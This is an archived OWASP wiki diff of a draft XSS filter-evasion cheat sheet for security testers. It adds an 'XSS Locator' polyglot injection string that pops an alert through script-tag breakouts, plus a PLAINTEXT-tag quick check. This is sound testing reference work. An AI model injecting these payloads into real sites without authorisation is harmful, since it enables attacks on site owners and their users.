This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "XSS Filter Evasion Cheat Sheet"
m |
|||
Line 6: | Line 6: | ||
= Tests = | = Tests = | ||
+ | '''XSS Locator :''' | ||
+ | Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this [http://ha.ckers.org/xss.html#XSScalc URL encoding calculator] to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably: | ||
+ | |||
+ | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; | ||
+ | alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> | ||
+ | <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | ||
= References = | = References = |
Revision as of 20:01, 3 September 2012
DRAFT CHEAT SHEET - WORK IN PROGRESS
Introduction
This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.
Tests
XSS Locator : Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
References
Authors and Primary Editors
RSnake
OWASP Cheat Sheets Project Homepage